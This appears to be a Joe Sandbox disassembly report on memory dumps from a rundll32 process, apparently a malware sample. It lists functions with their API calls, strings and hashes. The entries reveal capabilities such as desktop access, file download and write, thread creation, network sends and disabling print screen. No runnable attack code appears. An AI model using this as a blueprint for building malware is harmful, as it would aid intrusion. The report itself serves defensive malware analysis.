Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: _memset$AttributesCreateFilePathProcessSleepTemp_strrchrwsprintf
String ID: %s%s$D$WinSta0\Default
API String ID: 1046919704-212261555
Opcode ID: cbb6eb0e55a50f107b567210c96ee8a91741f003ff1e13c8da0d23fa8b6ec242
Instruction ID: 5a5de70a7a59dbc4313c7b84aed660f2cfbfb8b8a63138b78aba987b5d6d16e7
Opcode Fuzzy Hash: cbb6eb0e55a50f107b567210c96ee8a91741f003ff1e13c8da0d23fa8b6ec242
Instruction Fuzzy Hash: 42410CB2900118ABEB24DB64DC89FEE7378EF45704F0041D8E749A7181DB757B4ACBA1

Function 6D03C0F0 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 384COMMON

Download Yara Rule

Strings

DoH A: %u.%u.%u.%u, xrefs: 6D03C30B
DoH AAAA: , xrefs: 6D03C327
AAAA, xrefs: 6D03C248, 6D03C26E
DoH Host name: %s, xrefs: 6D03C2AB
TTL: %u seconds, xrefs: 6D03C2BD
CNAME: %s, xrefs: 6D03C3ED
Could not DoH-resolve: %s, xrefs: 6D03C14E
DoH: %s type %s for %s, xrefs: 6D03C26F
bad error code, xrefs: 6D03C25E
%s%02x%02x, xrefs: 6D03C36B

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID:
String ID: %s%02x%02x$AAAA$CNAME: %s$Could not DoH-resolve: %s$DoH A: %u.%u.%u.%u$DoH AAAA: $DoH Host name: %s$DoH: %s type %s for %s$TTL: %u seconds$bad error code
API String ID: 0-103626726
Opcode ID: 1797202a1d4b25d6fb748d28ea27e732106be1ac429a6ce3bf2290b6d59fa067
Instruction ID: 1c5a78c9c86314e1854fb5b7da8f10971f24d0b4919bf90c5c98ec3257fe5218
Opcode Fuzzy Hash: 1797202a1d4b25d6fb748d28ea27e732106be1ac429a6ce3bf2290b6d59fa067
Instruction Fuzzy Hash: 4DE1E6718083629FE720CF24CC84BABB7E4FF89304F06452CE9999B252D735A545CB9A

Function 6D02E470 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 214networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,00000006,00000000), ref: 6D02E64E
WSAGetLastError.WS2_32 ref: 6D02E658
send.WS2_32(?,?,?,00000000), ref: 6D02E6F3
WSAGetLastError.WS2_32 ref: 6D02E6FD

Strings

%c%c, xrefs: 6D02E61C
%c%s%c%s, xrefs: 6D02E5ED
Sending data failed (%d), xrefs: 6D02E65F, 6D02E704
%c%c%c%c%s%c%c, xrefs: 6D02E6C3
%c%s, xrefs: 6D02E5B9
%c%c%c%c, xrefs: 6D02E522
%127[^,]%1[,]%127s, xrefs: 6D02E597

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLastsend
String ID: %127[^,]%1[,]%127s$%c%c$%c%c%c%c$%c%c%c%c%s%c%c$%c%s$%c%s%c%s$Sending data failed (%d)
API String ID: 1802528911-3533120981
Opcode ID: eb0a6ddb77c0fe98497c8e560c5443a7947eba3191d2751c57d9b603f3712740
Instruction ID: 3d04f9c9503d2111ffb603d41ba4b6cde766dc83a9f615e54a6ec3280ed24360
Opcode Fuzzy Hash: eb0a6ddb77c0fe98497c8e560c5443a7947eba3191d2751c57d9b603f3712740
Instruction Fuzzy Hash: 8E71C3726882467BF730CB24CC49FEB77ECAB85708F140529F68DEB182DB71A5048796

Function 6D02DAA0 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 187COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 6D02DBDC
_strncpy.LIBCMT ref: 6D02DC21

Strings

TTYPE, xrefs: 6D02DBB9
XDISPLOC, xrefs: 6D02DBFE
Unknown telnet option %s, xrefs: 6D02DD1F
NEW_ENV, xrefs: 6D02DC43
%hu%*[xX]%hu, xrefs: 6D02DCB3
BINARY, xrefs: 6D02DCD6
Syntax error in telnet option: %s, xrefs: 6D02DD33
USER,%s, xrefs: 6D02DB10
%127[^= ]%*[ =]%255s, xrefs: 6D02DB9D

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: _strncpy
String ID: %127[^= ]%*[ =]%255s$%hu%*[xX]%hu$BINARY$NEW_ENV$Syntax error in telnet option: %s$TTYPE$USER,%s$Unknown telnet option %s$XDISPLOC
API String ID: 2961919466-748038847
Opcode ID: 975694e8d6b8c61d7d57019746551ce0e5c907eb63c7b0c6c476cd4f6054937c
Instruction ID: 87726c5e0741a9c224aaf74de48c6786e9d428115df9d6d2e2e1ae82c5f0335f
Opcode Fuzzy Hash: 975694e8d6b8c61d7d57019746551ce0e5c907eb63c7b0c6c476cd4f6054937c
Instruction Fuzzy Hash: AB619071808345ABF721DF60DC41FEB77E8BF95308F54482AE99D87142EB31E5188BA2

Function 6D03B400 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 172libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll,RtlVerifyVersionInfo,00000000,?), ref: 6D03B42E
GetProcAddress.KERNEL32(00000000), ref: 6D03B435
VerSetConditionMask.KERNEL32(00000000,00000000,00000002,?), ref: 6D03B501
VerSetConditionMask.KERNEL32(00000000,?,00000001,?), ref: 6D03B50B
VerSetConditionMask.KERNEL32(00000000,?,00000010,?,?,00000020,?,?,00000001,?), ref: 6D03B528
VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,?,?,00000020,?,?,00000001,?), ref: 6D03B534
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6D03B55C
VerifyVersionInfoW.KERNEL32(?,00000004,00000000), ref: 6D03B5E9

Strings

RtlVerifyVersionInfo, xrefs: 6D03B424
D?w, xrefs: 6D03B43B, 6D03B53B, 6D03B5B4
ntdll, xrefs: 6D03B429

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersion$AddressHandleModuleProc
String ID: D?w$RtlVerifyVersionInfo$ntdll
API String ID: 574519269-3637026075
Opcode ID: 29dd799cc4abb3483ff540716a029c0493c1b0bcf69b4f117c88a45f1583a25e
Instruction ID: 33d2d8954e4b6b80acc91585886d9e9ddcf2902488ea800cb2906a3176f22ef8
Opcode Fuzzy Hash: 29dd799cc4abb3483ff540716a029c0493c1b0bcf69b4f117c88a45f1583a25e
Instruction Fuzzy Hash: B0512771649362AFFB20DB25CC41FBF7BE8AB8A318F05441EF58897290C77594448BA3

Function 6D01FFF0 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 209encryptionCOMMON

Download Yara Rule

APIs

CertFreeCertificateContext.CRYPT32(?), ref: 6D020266

Strings

schannel: failed to setup memory allocation, xrefs: 6D020087
schannel: failed to setup replay detection, xrefs: 6D02005C
schannel: failed to setup confidentiality, xrefs: 6D020070
schannel: failed to store credential handle, xrefs: 6D0201B6
schannel: failed to retrieve ALPN result, xrefs: 6D0200E8
schannel: failed to retrieve remote cert context, xrefs: 6D020277
schannel: failed to setup sequence detection, xrefs: 6D020048
schannel: server selected an ALPN protocol too late, xrefs: 6D020131
schannel: failed to setup stream orientation, xrefs: 6D02009E

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: CertCertificateContextFree
String ID: schannel: failed to retrieve ALPN result$schannel: failed to retrieve remote cert context$schannel: failed to setup confidentiality$schannel: failed to setup memory allocation$schannel: failed to setup replay detection$schannel: failed to setup sequence detection$schannel: failed to setup stream orientation$schannel: failed to store credential handle$schannel: server selected an ALPN protocol too late
API String ID: 3080675121-1264606989
Opcode ID: 962c8111b921a541a59d1f800d490472fa55ce561909acce18f6ad858eca23ec
Instruction ID: 405b598d17de05f7fe6ec8bd266b5c941e9ba9195144fc06715569e7fc86fe5c
Opcode Fuzzy Hash: 962c8111b921a541a59d1f800d490472fa55ce561909acce18f6ad858eca23ec
Instruction Fuzzy Hash: 8071C17050E302ABF311DB15DC91FAF7BE8AF49349F440418FA4897282E775E558CBA6

Function 04EE4EC8 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 181COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 04EE4EEA
_strrchr.LIBCMT ref: 04EE4EF2
_memset.LIBCMT ref: 04EE4F26
_strrchr.LIBCMT ref: 04EE4F2E
_memset.LIBCMT ref: 04EE4FBA
_memset.LIBCMT ref: 04EE4FE6
_memset.LIBCMT ref: 04EE5000

Strings

D, xrefs: 04EE50B7

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: _memset$_strrchr
String ID: D
API String ID: 3722325190-2746444292
Opcode ID: 89c303740c1add9219757045c392371c27dadc62f405e1885f2600a688bbd819
Instruction ID: 9ffd79d0a074e5177fd7ad19b028055b8ea823c82cb4b673158efe917a0a51c1
Opcode Fuzzy Hash: 89c303740c1add9219757045c392371c27dadc62f405e1885f2600a688bbd819
Instruction Fuzzy Hash: 3C51D6B194031CABEB21DB64CC45FEA77789F54B09F4055C4E609AA1C0EB71B789CFA1

Function 6D03E970 Relevance: 16.1, APIs: 3, Strings: 6, Instructions: 391COMMON

Download Yara Rule

APIs

_strcspn.LIBCMT ref: 6D03EAAA
_strcspn.LIBCMT ref: 6D03EB68
_strncpy.LIBCMT ref: 6D03EC6A

Strings

Date, xrefs: 6D03ECC7
x-%s-date:%s, xrefs: 6D03EA19
%s: %s, xrefs: 6D03ED0D
Host, xrefs: 6D03EA32
X-%s-Date, xrefs: 6D03E9FB
host:%s, xrefs: 6D03EAE2

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: _strcspn$_strncpy
String ID: %s: %s$Date$Host$X-%s-Date$host:%s$x-%s-date:%s
API String ID: 4020253605-1552595612
Opcode ID: 549c28877b7f1dcff608615e6a7e9955db4b182a8f0a4a8476d57dde9e1be406
Instruction ID: 0fbfc00671bcdf4a0b5eaf555efcc5feabc436346f7be89ee41c6c0f7018a35b
Opcode Fuzzy Hash: 549c28877b7f1dcff608615e6a7e9955db4b182a8f0a4a8476d57dde9e1be406
Instruction Fuzzy Hash: 25D1E6719083579BF7118F249840BBB7BE5AF46308F064B6CED99DB242E731D909C7A2

Function 6D02FEAD Relevance: 16.1, APIs: 2, Strings: 7, Instructions: 332networkCOMMON

Download Yara Rule

APIs

sendto.WS2_32(?,?,?,00000000,?,?), ref: 6D03024A
WSAGetLastError.WS2_32(?,00000100,?,00000000,?,?), ref: 6D03025E

Strings

%s%c%s%c, xrefs: 6D02FF90
TFTP file name too long, xrefs: 6D02FF5C
timeout, xrefs: 6D0301B7
TFTP buffer too small for options, xrefs: 6D030052, 6D030227
%I64d, xrefs: 6D02FFF9
tsize, xrefs: 6D030062
blksize, xrefs: 6D03010D

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: ErrorLastsendto
String ID: %I64d$%s%c%s%c$TFTP buffer too small for options$TFTP file name too long$blksize$timeout$tsize
API String ID: 687199322-110720006
Opcode ID: 8f94e05a7a9a5304bc68781dff0dce91267d077b6324010733e42c6b81649212
Instruction ID: 32aafee5a4a01601aadfe932b90787fdc8757a324f2b086803307c4a398f93a5
Opcode Fuzzy Hash: 8f94e05a7a9a5304bc68781dff0dce91267d077b6324010733e42c6b81649212
Instruction Fuzzy Hash: A0C1F13510D3439FEB15CF25C890FFABBA6AF82308F19869CD5994B253D732A10ACB51

Function 04EB1200 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 173COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 04EB124A
std::_Xinvalid_argument.LIBCPMT ref: 04EB126B
_memmove.LIBCMT ref: 04EB12D3
_memmove.LIBCMT ref: 04EB1320
_memmove.LIBCMT ref: 04EB1369
_memmove.LIBCMT ref: 04EB138F
std::_Xinvalid_argument.LIBCPMT ref: 04EB13CD

Strings

invalid string position, xrefs: 04EB13C8
string too long, xrefs: 04EB1245, 04EB1266

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: 5608126295b724294e8b5c6edee891695153fff7b9480306aa197bfe8f8601f0
Instruction ID: 3372e999b56da08aa31f171a21e5e2499f898ccb9a805b5d150cb09037930e61
Opcode Fuzzy Hash: 5608126295b724294e8b5c6edee891695153fff7b9480306aa197bfe8f8601f0
Instruction Fuzzy Hash: D8511431700200ABEF08DB7DDDA59AF7666EBC03A9B146938E182C7785E535BD42C7C0

Function 04EC5F20 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 126filestringthreadCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 04EC5F62
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 04EC5F89
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 04EC5FC6
CloseHandle.KERNEL32(00000000), ref: 04EC5FD1
wsprintfA.USER32 ref: 04EC600D
lstrcpyA.KERNEL32(00000000,?), ref: 04EC6026
CreateThread.KERNEL32(00000000,00000000,Function_00015E80,00000000,00000000,00000000), ref: 04EC6067
CloseHandle.KERNEL32(00000000), ref: 04EC606E

Strings

%s %s, xrefs: 04EC6007

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: CloseCreateFileHandle$ThreadWrite_memsetlstrcpywsprintf
String ID: %s %s
API String ID: 3904585434-2939940506
Opcode ID: ce6455ce480881c68ea156e5262194ac55ec08d75716e1317d554d14517071be
Instruction ID: 610b6a1a35db26a853fc03b13801b501e462fdc5db8ff49f7e16b5d6b0c0b29c
Opcode Fuzzy Hash: ce6455ce480881c68ea156e5262194ac55ec08d75716e1317d554d14517071be
Instruction Fuzzy Hash: BF410572A00318ABDB359B74DC4AFEA7378FB44705F0402E8F509A6180DB747B46CB91

Function 04EC7059 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57libraryloadersleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 04EC706E
GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 04EC707C
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 04EC70B2
CloseHandle.KERNEL32(?), ref: 04EC70C8
Sleep.KERNEL32(00000001), ref: 04EC70D0
GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 04EC70DC
FreeLibrary.KERNEL32(00000000), ref: 04EC70F1

Strings

InternetCloseHandle, xrefs: 04EC70D6
InternetReadFile, xrefs: 04EC7076

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: AddressProc$CloseFileFreeHandleLibrarySleepWrite_memset
String ID: InternetCloseHandle$InternetReadFile
API String ID: 586530251-535091292
Opcode ID: 7a116f99f7403d4ef79378a6ef8ccebb73dad3a5298e264d57b8fc2b45728df4
Instruction ID: a5a5b6bee23f3a8128b3eb18b4aa43ed2d8ae441dda724dcd8732a7c1abf996a
Opcode Fuzzy Hash: 7a116f99f7403d4ef79378a6ef8ccebb73dad3a5298e264d57b8fc2b45728df4
Instruction Fuzzy Hash: 4A1151F6540218ABDB20ABA0DD86FEEB37CEF84701F004198E705A6141CA786E468FA5

Function 04EC35C0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 63libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,1CA2304D), ref: 04EC35F5
GetProcAddress.KERNEL32(00000000,OpenInputDesktop), ref: 04EC360C
GetProcAddress.KERNEL32(00000000,OpenDesktopA), ref: 04EC3616
GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 04EC361E

Part of subcall function 04EC3370: LoadLibraryA.KERNEL32(user32.dll,1CA2304D), ref: 04EC33BA
Part of subcall function 04EC3370: GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 04EC33D0
Part of subcall function 04EC3370: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 04EC33DE
Part of subcall function 04EC3370: GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 04EC33EC
Part of subcall function 04EC3370: GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 04EC33FA
Part of subcall function 04EC3370: LoadLibraryA.KERNEL32(kernel32.dll), ref: 04EC3407
Part of subcall function 04EC3370: GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 04EC3417

Strings

CloseDesktop, xrefs: 04EC3618
user32.dll, xrefs: 04EC35F0
OpenInputDesktop, xrefs: 04EC3600
OpenDesktopA, xrefs: 04EC3610

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseDesktop$OpenDesktopA$OpenInputDesktop$user32.dll
API String ID: 2238633743-3711086354
Opcode ID: df7dc50acb751f6d909d0df68a5e7c3fe2d741b8cd4b174abaedadb736831b9f
Instruction ID: ee713aea5084a918b4fccaf0b5a7656646ddf46909aa2471fd505497eee09302
Opcode Fuzzy Hash: df7dc50acb751f6d909d0df68a5e7c3fe2d741b8cd4b174abaedadb736831b9f
Instruction Fuzzy Hash: 6C119371A40218AFD710DFA9DD46BAFB7B8EB45A14F10413AE905A3340D7B878028AA5

Function 6D058680 Relevance: 13.9, APIs: 9, Instructions: 354COMMON

Download Yara Rule

APIs

?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(00000000,?), ref: 6D058737

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: DisablePrintScreen@@
String ID:
API String ID: 2435750010-0
Opcode ID: a31bec7ccbe20cba7260c612af59e95310245d4699f5e179928670ea72206f20
Instruction ID: 14e92bde5a67404c6cdabb022f0892fbddf7e66e878bc379ca0e094ec6124d1f
Opcode Fuzzy Hash: a31bec7ccbe20cba7260c612af59e95310245d4699f5e179928670ea72206f20
Instruction Fuzzy Hash: FFE16335E1422A8BDB25CF198E807EDBBB5BF59300F1481E9DD99A7300D671AED08F91

Function 04EE35D8 Relevance: 13.7, APIs: 9, Instructions: 235COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 04EE361C
_strncpy.LIBCMT ref: 04EE3639

Part of subcall function 04EE43F8: _memset.LIBCMT ref: 04EE4417
Part of subcall function 04EE43F8: _memset.LIBCMT ref: 04EE4431
Part of subcall function 04EE43F8: _memset.LIBCMT ref: 04EE447B

_strncpy.LIBCMT ref: 04EE3684
_strncpy.LIBCMT ref: 04EE374E
_strncpy.LIBCMT ref: 04EE3765
_strncpy.LIBCMT ref: 04EE37D9
_strncpy.LIBCMT ref: 04EE3820
_memset.LIBCMT ref: 04EE383D
_strncpy.LIBCMT ref: 04EE3888

Part of subcall function 04ED1058: std::_Xinvalid_argument.LIBCPMT ref: 04ED106E

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: _strncpy$_memset$Xinvalid_argumentstd::_
String ID:
API String ID: 3894514434-0
Opcode ID: 1741034cf7b41852be961f9bdc50938c924f20bd8ca339661be4e5add2ae981d
Instruction ID: 3a38c1b5b11c83679788870abeae74ebfa36781568e567a1a04aea191320578b
Opcode Fuzzy Hash: 1741034cf7b41852be961f9bdc50938c924f20bd8ca339661be4e5add2ae981d
Instruction Fuzzy Hash: C281EBB2D00224ABEB25EB65CC85BFD7778EF54304F4445D9EA09A7280DB30AB85CF95

Function 04EC69E0 Relevance: 13.6, APIs: 9, Instructions: 84synchronizationsleepstringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 04EC6A20
lstrcpyA.KERNEL32(?,?), ref: 04EC6A3F
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04EC6A6D
CreateThread.KERNEL32(00000000,00000000,Function_00013690,Function_00014520,00000000,00000000), ref: 04EC6A8D
WaitForSingleObject.KERNEL32(?,000000FF), ref: 04EC6A9E
CloseHandle.KERNEL32(?), ref: 04EC6AAB
Sleep.KERNEL32(?), ref: 04EC6AB8
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04EC6ACB
CloseHandle.KERNEL32(00000000), ref: 04EC6AD2

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: CloseCreateHandleObjectSingleWait$EventSleepThread_memsetlstrcpy
String ID:
API String ID: 1863454284-0
Opcode ID: a7c521f0928cae44039250d507bf42fd0cc07af85be469143a81fb956fa5f7c6
Instruction ID: 52aa1e6242259f9e54a8a4ad17d1cb56de78a05369f05e97b24f399517607f8f
Opcode Fuzzy Hash: a7c521f0928cae44039250d507bf42fd0cc07af85be469143a81fb956fa5f7c6
Instruction Fuzzy Hash: 2931E5B2A00318ABD724DBA4DC46BDA7778FB48711F0045A9F709A72C0CA746A41CBE4

Function 6D0115A0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 357networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(?), ref: 6D0117F8

Strings

.localhost, xrefs: 6D01175B
Hostname %s was found in DNS cache, xrefs: 6D011609
::1, xrefs: 6D0118D3
127.0.0.1, xrefs: 6D011808
localhost, xrefs: 6D01172A

Memory Dump Source

